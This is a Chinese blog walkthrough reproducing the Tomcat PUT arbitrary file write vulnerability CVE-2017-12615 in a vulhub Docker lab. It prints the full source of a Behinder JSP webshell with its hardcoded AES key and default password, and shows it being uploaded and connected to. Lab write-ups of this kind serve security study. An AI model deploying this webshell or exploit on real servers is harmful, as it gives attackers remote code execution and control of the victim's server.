Tomcat任意写入文件漏洞(CVE-2017-12615)漏洞复现

已于 2024-04-29 12:17:44 修改
阅读量773 收藏 1
点赞数 3
分类专栏: 漏洞复现 文章标签: tomcat 漏洞复现
于 2022-07-31 21:22:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55854679/article/details/126089036
版权

文章目录

漏洞概述

该漏洞的利用场景为当tomcat运行在windows下,允许PUT方式的http请求并且tomcatweb.xml配置文件中readonly值为false,攻击者就可以向服务器上传恶意jsp文件或webshell文件。tomcat服务器配置默认情况下readonly值为true无法触发漏洞,需要修改为false才能上传文件。

影响版本

Apache Tomcat >=7.0.0,<=7.0.79

漏洞复现

  1. 进入漏洞目录
cd vulhub/tomcat/CVE-2017-12615/
  1. 开启环境
docker-compose up -d
  1. 查看镜像
docker ps

在这里插入图片描述

  1. 进入镜像环境
docker exec -ti 03de30c386ea bash

在这里插入图片描述

  1. 查看配置文件conf/web.xmlreadonly的设置
    在这里插入图片描述
  2. 抓取刷新网页的数据包
    在这里插入图片描述
  3. 修改如下,即可成功上传一个冰蝎jsp木马:

在这里插入图片描述

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends
 ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return 
 super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String 
 k="e45e329feb5d925b";session.putValue("u",k);Cipher 
 c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new 
 U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equ
als(pageContext);}%>

该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond

  1. 访问shell.jsp,出现空白页面说明上传成功;
    在这里插入图片描述

  2. 使用冰蝎连接该木马【我尝试用蚁剑和菜刀连接jsp木马,发现木马类型没有jsp,就直接用冰蝎连了】

在这里插入图片描述
连接成功

在这里插入图片描述

poggioxay
关注
专栏目录
Tomcat (CVE-2017-12615漏洞复现
战神/calmness的博客
05-31 1115
内容涉及点: 任意写文件漏洞 简介 原理 影响范围 复现过程 自己的心得体会 任意写文件漏洞 简介 如果Tomcat开启了PUT方法(默认关闭,有点鸡肋,但是有些页面需要PUT, 无法关闭),则有可能存在远程命令执行漏洞,攻击者可以利用PUT方法上 传jsp文件,从而造成远程命令执行,getshell等。 原理 漏洞的产生是由于配置不当(非默认配置),将配置文件( conf/web.xml)中...
tomcat漏洞学习——CVE-2017-12615Tomcat任意写入文件漏洞
记录并分享学习安全的知识点..
05-05 896
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 目录 警告 一、概述 二、影响版本 三、漏洞原理 四、环境搭建 五、 漏洞复现 (一)手动验证复现 1.首先抓包,验证jsp文件: 2.发现404页面,换成txt文件,发现可以的: 3.根据源码,只要在jsp小马后面加一个/,就可以上传成功: 4.小马利用: ​(二)exp验证复现 ​(三)工具检测 一、概述 tomcat的配置具有可写权限,因此可以利用put方法上传任意文件。但是tomcat对...
漏洞复现Tomcat PUT方法任意写文件漏洞CVE-2017-12615
weixin_42090431的博客
01-02 727
2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615CVE-2017-12616,其中 远程代码执行漏洞CVE-2017-12615) 影响: Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全)
Tomcat CVE-2017-12615 靶场攻略
shw_yzh的博客
09-20 654
漏洞描述漏洞描述当 Tomcat运⾏在Windows操作系统时,且启⽤了HTTP PUT请求⽅法(例如,将 readonly初始化参数由默认值设置为false),攻击者将有可能可通过精⼼构造的攻击请求数据包向服务器上传包含任意代的 JSP ⽂件,JSP⽂件中的恶意代码将能被服务器执⾏。导致服务器上的数据泄露或获取服务器权限。漏洞原理当在Tomcat的conf(配置⽬录下)/web.xml配置⽂件中添加readonly设置为false时,将导致该漏洞产。
Tomcat CVE-2017-12615漏洞复现
最新发布
2401_82451607的博客
09-20 724
Tomcat CVE-2017-12615漏洞复现
Tomcat文件上传漏洞复现 CVE-2017-12615
m0_62284238的博客
09-08 620
tomcat文件上传漏洞复现 CVE-2017-12615
Tomcat任意文件上传(CVE-2017-12615漏洞复现(附POC)
byt8563的博客
06-30 4088
欢迎使用Markdown编辑器 • 漏洞名称:Tomcat任意文件上传漏洞漏洞编号:CVE-2017-12615漏洞影响:上传包含任意代码的文件,并被服务器执行。 • 影响平台:Windows • 影响版本:Apache Tomcat 7.0.0 - 7.0.81 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,
Tomcat任意文件写入(CVE-2017-12615)漏洞复现
weixin_45540609的博客
07-28 2032
一、漏洞原理 影响范围:pache Tomcat7.0.0-7.0.81(默认配置) 如果配置了默认servlet,则在9.0.1(Beta),8.5.23,8.0.47和7.0.82之前的所有Tomcat版本都包含所有操作系统上的潜在危险的远程执行代码(RCE)漏洞CVE-2017-12615:远程代码执行漏洞。只需参数readonly设置为false或者使用参数readonly设置启用WebDAV servlet false。此配置将允许任何未经身份验证的用户上传文件(如WebDAV中所使用的).
Tomcat任意写入文件漏洞CVE-2017-12615复现
m0_54899775的博客
03-17 4518
Tomcat任意写入文件漏洞CVE-2017-12615复现
Tomcat 通过 PUT 方法任意写入文件漏洞 (CVE-2017-12615)
薛定谔嘚喵博客
04-02 1247
CVE-2017-12615 对应的漏洞任意文件写入,由于配置不当(非默认配置),导致可以使用 PUT 方法上传任意文件 。Tomcat设置了写权限(readonly=false),导致可以使用PUT方法上传任意文件。
复现Tomcat PUT方法任意写文件(CVE-2017-12615
qq_54713392的博客
05-08 428
复现Tomcat PUT方法任意写文件(CVE-2017-12615漏洞原理: 漏洞的产生是由于配置不当(非默认配置),将配置文件( conf/web.xml)中的readonly设置为了false,导致可以使用PUT方法上传任意文件,但限制了jsp后缀,不过对于不同平台有多种绕过方法 攻击机:window10 IP:192.168.32.1 靶机:ubantu16.04 IP:192.168.32.142 (1)在vulhub靶场中找vulhub/tomcat/CVE-2017-12615 开启
Tomcat PUT方法任意写文件漏洞CVE-2017-12615
weixin_45653478的博客
05-02 1593
在Apache Tomcat服务器中,PUT方法通常用于上传文件。攻击者可以通过发送PUT请求,将恶意文件上传到服务器。当攻击者发送PUT请求时,Tomcat服务器会将请求中的数据写入指定的文件。如果攻击者能够控制文件路径,那么他们可以将恶意文件写入任意位置,从而实现任意文件写入。
tomcat 文件上传 (CVE-2017-12615)漏洞复现
weixin_42675091的博客
09-01 456
tomcat 文件上传 (CVE-2017-12615)漏洞复现
漏洞复现】Apache Tomcat远程代码执行漏洞CVE-2017-12615
网络安全从业者的学习笔记
12-28 842
2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,其中就有远程代码执行漏洞(CVE-2017-12615)。当 启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。
漏洞复现Tomcat 任意写入文件漏洞CVE-2017-12615
m0_46344990的博客
11-13 1489
Apache Tomcat 7.0.0到7.0.79版本中存在远程代码执行漏洞,当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法时,攻击者可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件,文件中的代码被服务器执行。
漏洞复现Tomcat CVE-2017-12615
2302_81105681的博客
05-30 384
漏洞原理,影响版本,漏洞复现
Tomcat任意写入文件漏洞CVE-2017-12615复现(详细完整原理篇,小白也能看得懂)
qq_68064663的博客
05-05 3626
tomcat任意写入文件漏洞复现
Tomcat PUT方法任意写文件(CVE-2017- 12615漏洞复现
weixin_51198941的博客
09-06 459
CVE-2017-12615是Apache Tomcat的一个远程代码执行漏洞。该漏洞影响Apache Tomcat 7.0.0至7.0.79版本(7.0.81修复不完全)。漏洞原理Tomcat 运行在 Windows 主机上,且启用了HTTP PUT。
Tomcat漏洞(文件包含漏洞
qq_68186313的博客
08-06 258
由于Tomcat AJP协议设计上的缺陷,攻击者通过Tomcat AJP Connector可以读取或包含Tomcat.上所有Webapp目录下的任意文件,例如:可以读取webapp配置文件或源码文件。此外如果目标应用有文件上传的功能情况下,配合为文件包含漏洞利用GetShe‖。tomcat默认的conf/server.xml中配置了2个Connector,一个为8080的对外提供的HTTP协议端口,另外一个就是默认的8009AJP协议端口,两个端口默认均监听在外网ip。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

poggioxay

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值